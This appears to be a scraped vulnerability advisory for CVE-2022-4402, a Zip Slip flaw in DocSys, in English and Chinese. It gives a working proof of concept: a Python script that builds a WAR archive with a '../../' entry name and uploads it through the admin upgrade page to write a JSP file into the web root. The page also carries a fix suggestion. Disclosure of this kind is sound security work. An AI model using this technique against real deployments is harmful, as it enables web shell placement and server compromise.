Headline

CVE-2022-4402: 【缺陷】Zip Slip vulnerability · Issue #I65IYU · Rainy/DocSys - Gitee.com

A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '…/filedir’. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271.

2 years ago

CVE

Open in Source

#sql #vulnerability #web #js #git #java

Instructions in English****Description

There is a Zip Slip vulnerability in the MxsDoc(DocSys) application that can cause malicious jsp files to be uploaded. The vulnerability is located in the BaseController.java file, where the unZip method did not Check "… /". This vulnerability can also be triggered by the upgradeSystem method of the ManageController.java file. Writes a malicious jsp file to the web directory.

Impact

Affected version: less than or equal to DocSys_V2.02.37(latest version)
Condition of utilization：The administrator or super administrator rights are required
Impact：A zip slip vulnerability in this system can result in getshell

Code Audit

In com.DocSystem.Controller.BaseController#unZip method exists in the following code snippet:

The value of entry.getName() is controllable. Inject "… /", you can write the malicious jsp file to the web root.

Looking for a trigger point, found in com.DocSystem.Controller.ManageController#upgradeSystem method triggers the com.DocSystem.Controller.BaseController#unZip method.
The key code is as follows:

Steps to reproduce****Application Installation

This system is available on both github and gitee, but there is a war package on github for easy deployment. The download address is as follows: https://github.com/RainyGao-GitHub/DocSys/releases

After downloading DocSystem.war, unzip it, store it in the tomcat webapps directory, and modify the database configuration file jdbc.properties:

db.type=mysql
db.driver=com.mysql.cj.jdbc.Driver
db.url=jdbc:mysql://localhost:3306/DocSystem1?useUnicode=true&characterEncoding=UTF-8&serverTimezone=UTC
db.username=root
db.password=root

After the success of the start tomcat, visit http://localhost:8080/DocSystem/web/index.html
During application initialization, you need to create a system administrator: admin/admin123

Create malicious compressed files

tgao.jsp file contents:

<html>
<body>
    <%
        out.println("zip slip getshell.");
    %>
</body>
</html>

Write a python script to compress the jsp file contents into DocSystem.war and specify the name as …/…/DocSystem/tgao.jsp, which corresponds to entry.getName() in the source code.

import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
        info = zipfile.ZipInfo("DocSystem.war")
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
        zipFile.close()
    except IOError as e:
        raise e

Run the python script to generate the DocSystem.war file

Exploitation of vulnerabilities

After using the admin/admin123 login system，go to http://localhost:8080/DocSystem/manager/main.html

Click the Upgrade button and upload the malicious compressed file DocSystem.war

Click the Confirm button，Visit: http://localhost:8080/DocSystem/tgao.jsp

The tgao.jsp file was successfully written.

Bug Repair Suggestions

Check whether the contents returned by entry.getName() exist “…/” and intercept

中文说明****漏洞描述

MxsDoc(DocSys)中存在一个Zip Slip漏洞，可导致上传恶意jsp文件。漏洞位于BaseController.java文件，其中unZip方法解压文件时未对…/ 进行检测，导致Zip Slip漏洞存在，另外可通过ManageController.java文件的upgradeSystem方法触发此漏洞。可导致像web目录写入恶意jsp文件。

漏洞影响

影响版本：小于等于DocSys_V2.02.37(最新版本)
利用条件：需要管理员权限登录
危害：此系统的zip slip可导致getshell

漏洞发现

在com.DocSystem.controller.BaseController#unZip方法中存在如下代码片段

其中entry.getName()的值是可控的，通过…/可以将恶意jsp文件写到web根目录。
寻找触发点，发现在com.DocSystem.controller.ManageController#upgradeSystem方法中触发了com.DocSystem.controller.BaseController#unZip方法
关键代码如下：

漏洞复现****制作恶意压缩包

tgao.jsp文件内容：

<html>
<body>
    <%
        out.println("zip slip getshell.");
    %>
</body>
</html>

编写python脚本将jsp文件内容内容压缩至DocSystem.war中，并指定name为…/…/DocSystem/tgao.jsp，此值对应源码中的entry.getName()内容

import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
        info = zipfile.ZipInfo("DocSystem.war")
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
        zipFile.close()
    except IOError as e:
        raise e

运行之后生成DocSystem.war文件

漏洞利用

使用admin/admin123登录系统后访问：
http://localhost:8080/DocSystem/manager/main.html

点击系统升级，上传制作完成的恶意压缩文件DocSystem.war

点击确认即可.
访问：http://localhost:8080/DocSystem/tgao.jsp

tgao.jsp成功被写入。

修复建议

检查entry.getName()是否存在…/并拦截